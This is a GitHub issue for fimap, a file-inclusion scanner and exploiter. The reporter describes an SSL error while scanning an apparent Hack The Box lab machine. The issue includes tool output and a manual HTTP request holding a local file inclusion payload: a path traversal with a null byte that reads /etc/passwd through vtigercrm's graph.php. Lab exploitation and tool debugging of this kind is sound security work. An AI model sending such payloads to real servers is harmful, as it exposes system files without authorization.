kurobeats / fimap

fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps.
GNU General Public License v2.0
514 stars 99 forks source link

SSL: Unsupported_Protocol #87

Open JustOneMoreDog opened 5 years ago

JustOneMoreDog commented 5 years ago

This url has a known lfi but I am unable to get fimap to bypass the ssl check. I am still diving into the code to try and figure this out but figured I should let you know about it

root@kalix64:~/htb/beep# fimap -u https://10.10.10.7/vtigercrm/graph.php?current_language=
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: 'https://10.10.10.7/vtigercrm/graph.php?current_language='
[19:16:08] [OUT] Inspecting URL 'https://10.10.10.7/vtigercrm/graph.php?current_language='...
[19:16:08] [INFO] Fiddling around with URL...
[19:16:08] [WARN] <urlopen error [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:727)>
Target URL isn't affected by any file inclusion bug :(

I took a look at https://www.stackoverflow.com/questions/32330919/python-ssl-ssl-sslerror-ssl-unsupported-protocol-unsupported-protocol-ssl and tried modifying the mainClass.py, crawler.py, and browser.py files to match but could not get it to past that error.

This is what the lfi request looks like if executed manually

GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action HTTP/1.1
Host: 10.10.10.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: testing=1; PHPSESSID=n9arcpjr1g8eecov6pd43c8q67; elastixSession=4q0k0i9lqq64fka4g20pkof643
Upgrade-Insecure-Requests: 1

I am not entirely sure if fimap will be able to do this LFI since it has a filter in the form of %00&module=Accounts&action needing to be appended to the request. I do not think fimap supports filters? Regardless, its still an awesome tool and I love it.